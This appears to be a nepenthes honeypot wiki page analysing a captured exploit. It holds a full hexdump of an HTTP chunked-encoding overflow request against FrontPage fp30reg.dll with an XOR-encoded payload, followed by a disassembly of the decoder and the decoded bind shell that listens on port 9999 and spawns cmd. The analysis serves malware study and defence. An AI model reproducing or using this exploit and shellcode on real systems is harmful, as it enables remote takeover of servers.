Kaltenborn Shellcode

The Shellcode

raw

hexdump -C var/hexdumps/1823b5bc18bacfa93a91dbdecad5ad3e.bin
00000000  50 4f 53 54 20 2f 5f 76  74 69 5f 62 69 6e 2f 5f  |POST /_vti_bin/_|
00000010  76 74 69 5f 61 75 74 2f  66 70 33 30 72 65 67 2e  |vti_aut/fp30reg.|
00000020  64 6c 6c 20 48 54 54 50  2f 31 2e 31 0d 0a 48 6f  |dll HTTP/1.1..Ho|
00000030  73 74 3a 20 XX XX XX XX  XX XX XX XX XX XX XX XX  |st: XXXXXXXXXXXX|
00000040  XX 0d 0a 54 72 61 6e 73  66 65 72 2d 45 6e 63 6f  |X..Transfer-Enco|
00000050  64 69 6e 67 3a 20 63 68  75 6e 6b 65 64 0d 0a 43  |ding: chunked..C|
00000060  6f 6e 74 65 6e 74 2d 4c  65 6e 67 74 68 3a 20 31  |ontent-Length: 1|
00000070  34 39 39 0d 0a 0d 0a 35  64 62 0d 0a 90 90 90 90  |499....5db......|
00000080  90 90 90 90 90 90 90 90  90 90 90 90 ff d0 90 90  |................|
00000090  e0 f3 d4 67 90 90 90 90  90 90 90 90 90 90 90 90  |...g............|
000000a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000180  eb 10 90 90 e4 f3 d4 67  90 90 90 90 90 90 90 90  |.......g........|
00000190  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000001b0  90 90 90 90 90 90 90 90  90 90 90 90 eb 03 5d eb  |..............].|
000001c0  05 e8 f8 ff ff ff 8b c5  83 c0 11 33 c9 66 b9 c9  |...........3.f..|
000001d0  01 80 30 88 40 e2 fa dd  03 64 03 7c 09 64 08 88  |..0.@....d.|.d..|
000001e0  88 88 60 c4 89 88 88 01  ce 74 77 fe 74 e0 06 c6  |..`......tw.t...|
000001f0  86 64 60 d9 89 88 88 01  ce 4e e0 bb ba 88 88 e0  |.d`......N......|
00000200  ff fb ba d7 dc 77 de 4e  01 ce 70 77 fe 74 e0 25  |.....w.N..pw.t.%|
00000210  51 8d 46 60 b8 89 88 88  01 ce 5a 77 fe 74 e0 fa  |Q.F`......Zw.t..|
00000220  76 3b 9e 60 a8 89 88 88  01 ce 46 77 fe 74 e0 67  |v;.`......Fw.t.g|
00000230  46 68 e8 60 98 89 88 88  01 ce 42 77 fe 70 e0 43  |Fh.`......Bw.p.C|
00000240  65 74 b3 60 88 89 88 88  01 ce 7c 77 fe 70 e0 51  |et.`......|w.p.Q|
00000250  81 7d 25 60 78 88 88 88  01 ce 78 77 fe 70 e0 2c  |.}%`x.....xw.p.,|
00000260  92 f8 4f 60 68 88 88 88  01 ce 64 77 fe 70 e0 2c  |..O`h.....dw.p.,|
00000270  25 a6 61 60 58 88 88 88  01 ce 60 77 fe 70 e0 6d  |%.a`X.....`w.p.m|
00000280  c1 0e c1 60 48 88 88 88  01 ce 6a 77 fe 70 e0 6f  |...`H.....jw.p.o|
00000290  f1 4e f1 60 38 88 88 88  01 ce 5e bb 77 09 64 7c  |.N.`8.....^.w.d||
000002a0  89 88 88 dc e0 89 89 88  88 77 de 7c d8 d8 d8 d8  |.........w.|....|
000002b0  c8 d8 c8 d8 77 de 78 03  50 df df e0 8a 88 af 87  |....w.x.P.......|
000002c0  03 44 e2 9e d9 db 77 de  64 df db 77 de 60 bb 77  |.D....w.d..w.`.w|
000002d0  df d9 db 77 de 6a 03 58  01 ce 36 e0 eb e5 ec 88  |...w.j.X..6.....|
000002e0  01 ee 4a 0b 4c 24 05 b4  ac bb 48 bb 41 08 49 9d  |..J.L$....H.A.I.|
000002f0  23 6a 75 4e cc ac 98 cc  76 cc ac b5 01 dc ac c0  |#juN....v.......|
00000300  01 dc ac c4 01 dc ac d8  05 cc ac 98 dc d8 d9 d9  |................|
00000310  d9 c9 d9 c1 d9 d9 77 fe  4a d9 77 de 46 03 44 e2  |......w.J.w.F.D.|
00000320  77 77 b9 77 de 5a 03 40  77 fe 36 77 de 5e 63 16  |ww.w.Z.@w.6w.^c.|
00000330  77 de 9c de ec 29 b8 88  88 88 03 c8 84 03 f8 94  |w....)..........|
00000340  25 03 c8 80 d6 4a 8c 88  db dd de df 03 e4 ac 90  |%....J..........|
00000350  03 cd b4 03 dc 8d f0 8b  5d 03 c2 90 03 d2 a8 8b  |........].......|
00000360  55 6b ba c1 03 bc 03 8b  7d bb 77 74 bb 48 24 b2  |Uk......}.wt.H$.|
00000370  4c fc 8f 49 47 85 8b 70  63 7a b3 f4 ac 9c fd 69  |L..IG..pcz.....i|
00000380  03 d2 ac 8b 55 ee 03 84  c3 03 d2 94 8b 55 03 8c  |....U........U..|
00000390  03 8b 4d 63 8a bb 48 03  5d d7 d6 d5 d3 4a 8c 88  |..Mc..H.]....J..|
000003a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000650  90 90 90 90 90 90 90 0d  0a 30 0d 0a 0d 0a        |.........0....|
0000065e

unxor'd

FIXME

Analysis

xor decoder

00424A3D   EB 03            JMP SHORT 722b3019.00424A42
00424A3F   5D               POP EBP
00424A40   EB 05            JMP SHORT 722b3019.00424A47
00424A42   E8 F8FFFFFF      CALL 722b3019.00424A3F
00424A47   8BC5             MOV EAX,EBP
00424A49   83C0 11          ADD EAX,11
00424A4C   33C9             XOR ECX,ECX
00424A4E   66:B9 C901       MOV CX,1C9                               ; xor size
00424A52   8030 88          XOR BYTE PTR DS:[EAX],88                 ; xor key 88
00424A55   40               INC EAX
00424A56  ^E2 FA            LOOPD SHORT 722b3019.00424A52

unxor'd shellcode

00424A35   90               NOP
00424A36   90               NOP
00424A37   90               NOP
00424A38   90               NOP
00424A39   90               NOP
00424A3A   90               NOP
00424A3B   90               NOP
00424A3C   90               NOP
00424A3D   EB 03            JMP SHORT 722b3019.00424A42
00424A3F   5D               POP EBP
00424A40   EB 05            JMP SHORT 722b3019.00424A47
00424A42   E8 F8FFFFFF      CALL 722b3019.00424A3F
00424A47   8BC5             MOV EAX,EBP
00424A49   83C0 11          ADD EAX,11
00424A4C   33C9             XOR ECX,ECX
00424A4E   66:B9 C901       MOV CX,1C9                               ; xor size
00424A52   8030 88          XOR BYTE PTR DS:[EAX],88                 ; xor key 88
00424A55   40               INC EAX
00424A56  ^E2 FA            LOOPD SHORT 722b3019.00424A52
00424A58   55               PUSH EBP
00424A59   8BEC             MOV EBP,ESP
00424A5B   8BF4             MOV ESI,ESP
00424A5D   81EC 80000000    SUB ESP,80
00424A63   E8 4C010000      CALL 722b3019.00424BB4
00424A68   8946 FC          MOV DWORD PTR DS:[ESI-4],EAX
00424A6B   FF76 FC          PUSH DWORD PTR DS:[ESI-4]
00424A6E   68 8E4E0EEC      PUSH EC0E4E8E
00424A73   E8 51010000      CALL 722b3019.00424BC9
00424A78   8946 C6          MOV DWORD PTR DS:[ESI-3A],EAX            ; LoadLibraryA
00424A7B   68 33320000      PUSH 3233
00424A80   68 7773325F      PUSH 5F327377
00424A85   54               PUSH ESP
00424A86   FF56 C6          CALL DWORD PTR DS:[ESI-3A]               ; call LoadLibraryA
00424A89   8946 F8          MOV DWORD PTR DS:[ESI-8],EAX             ; WS2_32.#390
00424A8C   FF76 FC          PUSH DWORD PTR DS:[ESI-4]
00424A8F   68 ADD905CE      PUSH CE05D9AD
00424A94   E8 30010000      CALL 722b3019.00424BC9
00424A99   8946 D2          MOV DWORD PTR DS:[ESI-2E],EAX            ; WaitForSingleObject
00424A9C   FF76 FC          PUSH DWORD PTR DS:[ESI-4]
00424A9F   68 72FEB316      PUSH 16B3FE72
00424AA4   E8 20010000      CALL 722b3019.00424BC9
00424AA9   8946 CE          MOV DWORD PTR DS:[ESI-32],EAX            ; CreateProcessA
00424AAC   FF76 FC          PUSH DWORD PTR DS:[ESI-4]
00424AAF   68 EFCEE060      PUSH 60E0CEEF
00424AB4   E8 10010000      CALL 722b3019.00424BC9
00424AB9   8946 CA          MOV DWORD PTR DS:[ESI-36],EAX            ; ExitThread
00424ABC   FF76 F8          PUSH DWORD PTR DS:[ESI-8]
00424ABF   68 CBEDFC3B      PUSH 3BFCEDCB
00424AC4   E8 00010000      CALL 722b3019.00424BC9
00424AC9   8946 F4          MOV DWORD PTR DS:[ESI-C],EAX             ; WSAStartup
00424ACC   FF76 F8          PUSH DWORD PTR DS:[ESI-8]
00424ACF   68 D909F5AD      PUSH ADF509D9
00424AD4   E8 F0000000      CALL 722b3019.00424BC9
00424AD9   8946 F0          MOV DWORD PTR DS:[ESI-10],EAX            ; WSASocketA
00424ADC   FF76 F8          PUSH DWORD PTR DS:[ESI-8]
00424ADF   68 A41A70C7      PUSH C7701AA4
00424AE4   E8 E0000000      CALL 722b3019.00424BC9
00424AE9   8946 EC          MOV DWORD PTR DS:[ESI-14],EAX            ; bind
00424AEC   FF76 F8          PUSH DWORD PTR DS:[ESI-8]
00424AEF   68 A4AD2EE9      PUSH E92EADA4
00424AF4   E8 D0000000      CALL 722b3019.00424BC9
00424AF9   8946 E8          MOV DWORD PTR DS:[ESI-18],EAX            ; listen
00424AFC   FF76 F8          PUSH DWORD PTR DS:[ESI-8]
00424AFF   68 E5498649      PUSH 498649E5
00424B04   E8 C0000000      CALL 722b3019.00424BC9
00424B09   8946 E2          MOV DWORD PTR DS:[ESI-1E],EAX            ; accept
00424B0C   FF76 F8          PUSH DWORD PTR DS:[ESI-8]
00424B0F   68 E779C679      PUSH 79C679E7
00424B14   E8 B0000000      CALL 722b3019.00424BC9
00424B19   8946 D6          MOV DWORD PTR DS:[ESI-2A],EAX            ; closesocket
00424B1C   33FF             XOR EDI,EDI
00424B1E   81EC F4010000    SUB ESP,1F4
00424B24   54               PUSH ESP
00424B25   68 01010000      PUSH 101
00424B2A   FF56 F4          CALL DWORD PTR DS:[ESI-C]                ; call WSAStartup
00424B2D   50               PUSH EAX
00424B2E   50               PUSH EAX
00424B2F   50               PUSH EAX
00424B30   50               PUSH EAX
00424B31   40               INC EAX
00424B32   50               PUSH EAX
00424B33   40               INC EAX
00424B34   50               PUSH EAX
00424B35   FF56 F0          CALL DWORD PTR DS:[ESI-10]               ; call WSASocketA
00424B38   8BD8             MOV EBX,EAX
00424B3A   57               PUSH EDI
00424B3B   57               PUSH EDI
00424B3C   68 0200270F      PUSH 0F270002                            ; port 270f ( 9999 )
00424B41   8BCC             MOV ECX,ESP
00424B43   6A 16            PUSH 16
00424B45   51               PUSH ECX
00424B46   53               PUSH EBX
00424B47   FF56 EC          CALL DWORD PTR DS:[ESI-14]               ; call bind
00424B4A   57               PUSH EDI
00424B4B   53               PUSH EBX
00424B4C   FF56 E8          CALL DWORD PTR DS:[ESI-18]               ; call listen
00424B4F   33FF             XOR EDI,EDI
00424B51   57               PUSH EDI
00424B52   51               PUSH ECX
00424B53   53               PUSH EBX
00424B54   FF56 E2          CALL DWORD PTR DS:[ESI-1E]               ; call accept
00424B57   8BD0             MOV EDX,EAX
00424B59   8946 BE          MOV DWORD PTR DS:[ESI-42],EAX
00424B5C   68 636D6400      PUSH 646D63
00424B61   8966 C2          MOV DWORD PTR DS:[ESI-3E],ESP
00424B64   83C4 AC          ADD ESP,-54
00424B67   8D3C24           LEA EDI,DWORD PTR SS:[ESP]
00424B6A   33C0             XOR EAX,EAX
00424B6C   33C9             XOR ECX,ECX
00424B6E   80C1 15          ADD CL,15
00424B71   AB               STOS DWORD PTR ES:[EDI]
00424B72  ^E2 FD            LOOPD SHORT 722b3019.00424B71
00424B74   C64424 10 44     MOV BYTE PTR SS:[ESP+10],44
00424B79   FE4424 3D        INC BYTE PTR SS:[ESP+3D]
00424B7D   895424 48        MOV DWORD PTR SS:[ESP+48],EDX
00424B81   895424 4C        MOV DWORD PTR SS:[ESP+4C],EDX
00424B85   895424 50        MOV DWORD PTR SS:[ESP+50],EDX
00424B89   8D4424 10        LEA EAX,DWORD PTR SS:[ESP+10]
00424B8D   54               PUSH ESP
00424B8E   50               PUSH EAX
00424B8F   51               PUSH ECX
00424B90   51               PUSH ECX
00424B91   51               PUSH ECX
00424B92   41               INC ECX
00424B93   51               PUSH ECX
00424B94   49               DEC ECX
00424B95   51               PUSH ECX
00424B96   51               PUSH ECX
00424B97   FF76 C2          PUSH DWORD PTR DS:[ESI-3E]
00424B9A   51               PUSH ECX
00424B9B   FF56 CE          CALL DWORD PTR DS:[ESI-32]               ; call CreateProcessA
00424B9E   8BCC             MOV ECX,ESP
00424BA0   6A FF            PUSH -1
00424BA2   FF31             PUSH DWORD PTR DS:[ECX]
00424BA4   FF56 D2          CALL DWORD PTR DS:[ESI-2E]               ; call WaitForSingleObject
00424BA7   8BC8             MOV ECX,EAX
00424BA9   FF76 BE          PUSH DWORD PTR DS:[ESI-42]
00424BAC   FF56 D6          CALL DWORD PTR DS:[ESI-2A]               ; call closesocket
00424BAF  ^EB 9E            JMP SHORT 722b3019.00424B4F
00424BB1   FF56 14          CALL DWORD PTR DS:[ESI+14]

nepenthes

Development

Scene

Service

Misc

Kaltenborn Shellcode

The Shellcode

raw

unxor'd

Analysis

xor decoder

unxor'd shellcode